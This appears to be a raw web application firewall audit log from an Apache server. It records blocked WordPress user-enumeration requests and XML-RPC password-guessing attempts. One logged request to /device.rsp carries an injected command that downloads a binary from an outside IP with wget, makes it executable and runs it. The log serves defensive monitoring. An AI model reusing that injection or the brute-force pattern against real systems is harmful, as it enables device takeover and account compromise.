(CVE-2013-0235)|Source 175.117.144.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748140503797125 4977 (- - -) Stopwatch2: 1748140503797125 4977; combined=3700, p1=485, p2=3068, p3=0, p4=0, p5=87, sr=81, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa4ea10-Z-- --0dbcc108-A-- [25/May/2025:09:43:21 +0700] aDKDyREdxfhJOSxH8A_tVQAAAE0 103.236.140.4 45498 103.236.140.4 8181 --0dbcc108-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.57.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.57.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0dbcc108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dbcc108-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141001788203 3575 (- - -) Stopwatch2: 1748141001788203 3575; combined=1438, p1=463, p2=944, p3=0, p4=0, p5=31, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dbcc108-Z-- --6de3644b-A-- [25/May/2025:09:43:27 +0700] aDKDzxEdxfhJOSxH8A_tWAAAAFE 103.236.140.4 45506 103.236.140.4 8181 --6de3644b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 138.201.202.121 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 138.201.202.121 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6de3644b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi+++ --6de3644b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6de3644b-E-- --6de3644b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 138.201.202.121 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141007789523 4649 (- - -) Stopwatch2: 1748141007789523 4649; combined=3349, p1=407, p2=2808, p3=0, p4=0, p5=79, sr=62, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6de3644b-Z-- --090dee3d-A-- [25/May/2025:09:50:33 +0700] aDKFeXP6UgzLD1l8HTruNgAAAAc 103.236.140.4 45746 103.236.140.4 8181 --090dee3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 138.201.202.121 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 138.201.202.121 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --090dee3d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFaHmI@2020 --090dee3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --090dee3d-E-- --090dee3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 138.201.202.121 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141433860650 6199 (- - -) Stopwatch2: 1748141433860650 6199; combined=4301, p1=580, p2=3528, p3=0, p4=0, p5=112, sr=94, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090dee3d-Z-- --94210147-A-- [25/May/2025:09:50:34 +0700] aDKFenP6UgzLD1l8HTruNwAAABg 103.236.140.4 45748 103.236.140.4 8181 --94210147-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.154.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.154.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --94210147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94210147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748141434092354 2377 (- - -) Stopwatch2: 1748141434092354 2377; combined=1102, p1=368, p2=708, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94210147-Z-- --982a164f-A-- [25/May/2025:10:32:59 +0700] aDKPa9erygsLmB9N_YRLngAAAIo 103.236.140.4 46748 103.236.140.4 8181 --982a164f-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 176.65.148.236 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.148.236 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --982a164f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982a164f-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748143979653528 781 (- - -) Stopwatch2: 1748143979653528 781; combined=347, p1=315, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982a164f-Z-- --8e9de05d-A-- [25/May/2025:10:46:23 +0700] aDKSj3awJq5017Xs8D698wAAANg 103.236.140.4 47152 103.236.140.4 8181 --8e9de05d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.68.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.68.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e9de05d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e9de05d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748144783199948 3014 (- - -) Stopwatch2: 1748144783199948 3014; combined=1315, p1=483, p2=802, p3=0, p4=0, p5=30, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e9de05d-Z-- --64707930-A-- [25/May/2025:11:00:55 +0700] aDKV99erygsLmB9N_YRL_AAAAJY 103.236.140.4 47416 103.236.140.4 8181 --64707930-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.156.42.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.156.42.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --64707930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64707930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748145655379514 3172 (- - -) Stopwatch2: 1748145655379514 3172; combined=1450, p1=448, p2=955, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64707930-Z-- --190b6b6b-A-- [25/May/2025:11:01:37 +0700] aDKWIderygsLmB9N_YRL_wAAAIA 103.236.140.4 47436 103.236.140.4 8181 --190b6b6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --190b6b6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --190b6b6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748145697952394 3117 (- - -) Stopwatch2: 1748145697952394 3117; combined=1392, p1=461, p2=901, p3=0, p4=0, p5=30, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --190b6b6b-Z-- --7b4efe3c-A-- [25/May/2025:11:24:42 +0700] aDKbinP6UgzLD1l8HTrwRQAAAAE 103.236.140.4 53314 103.236.140.4 8181 --7b4efe3c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 116.118.104.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7b4efe3c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi#1234 --7b4efe3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b4efe3c-E-- --7b4efe3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 116.118.104.42 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748147082157661 5775 (- - -) Stopwatch2: 1748147082157661 5775; combined=4100, p1=506, p2=3426, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b4efe3c-Z-- --5aed8841-A-- [25/May/2025:11:29:16 +0700] aDKcnBEdxfhJOSxH8A_zRAAAAEk 103.236.140.4 57278 103.236.140.4 8181 --5aed8841-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 116.118.104.42 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5aed8841-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFahmi4 --5aed8841-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aed8841-E-- --5aed8841-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 116.118.104.42 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748147356639999 7355 (- - -) Stopwatch2: 1748147356639999 7355; combined=5345, p1=711, p2=4459, p3=0, p4=0, p5=107, sr=124, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aed8841-Z-- --a929e50c-A-- [25/May/2025:12:23:06 +0700] aDKpOhEdxfhJOSxH8A_87QAAAFA 103.236.140.4 54826 103.236.140.4 8181 --a929e50c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.29.224.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.29.224.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a929e50c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a929e50c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748150586371070 3547 (- - -) Stopwatch2: 1748150586371070 3547; combined=1750, p1=512, p2=1201, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a929e50c-Z-- --dba0bc5d-A-- [25/May/2025:13:10:45 +0700] aDK0ZXP6UgzLD1l8HToMFQAAABU 103.236.140.4 33400 103.236.140.4 8181 --dba0bc5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.229.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.229.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dba0bc5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dba0bc5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748153445183337 2434 (- - -) Stopwatch2: 1748153445183337 2434; combined=1052, p1=354, p2=675, p3=0, p4=0, p5=23, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba0bc5d-Z-- --fa30e141-A-- [25/May/2025:13:38:41 +0700] aDK68REdxfhJOSxH8A8PmwAAAE4 103.236.140.4 48260 103.236.140.4 8181 --fa30e141-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.69.98.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.69.98.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa30e141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa30e141-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155121006684 2582 (- - -) Stopwatch2: 1748155121006684 2582; combined=1153, p1=375, p2=742, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa30e141-Z-- --696a8a6a-A-- [25/May/2025:13:38:46 +0700] aDK69nawJq5017Xs8D7s3QAAAMM 103.236.140.4 48320 103.236.140.4 8181 --696a8a6a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --696a8a6a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFaHmI15 --696a8a6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --696a8a6a-E-- --696a8a6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155126460291 6391 (- - -) Stopwatch2: 1748155126460291 6391; combined=4581, p1=540, p2=3866, p3=0, p4=0, p5=104, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --696a8a6a-Z-- --0e318359-A-- [25/May/2025:13:39:41 +0700] aDK7LderygsLmB9N_YRzMwAAAJE 103.236.140.4 48814 103.236.140.4 8181 --0e318359-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0e318359-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix-admin2023 --0e318359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e318359-E-- --0e318359-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155181169862 5909 (- - -) Stopwatch2: 1748155181169862 5909; combined=4188, p1=533, p2=3475, p3=0, p4=0, p5=108, sr=150, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e318359-Z-- --d91fbb7e-A-- [25/May/2025:13:44:30 +0700] aDK8ThEdxfhJOSxH8A8RewAAAEY 103.236.140.4 51314 103.236.140.4 8181 --d91fbb7e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.178.146.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.178.146.199 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d91fbb7e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantixweb@gmail.com --d91fbb7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d91fbb7e-E-- --d91fbb7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.178.146.199 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748155470933767 5302 (- - -) Stopwatch2: 1748155470933767 5302; combined=4272, p1=466, p2=3612, p3=0, p4=0, p5=111, sr=85, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d91fbb7e-Z-- --0ddc6d4b-A-- 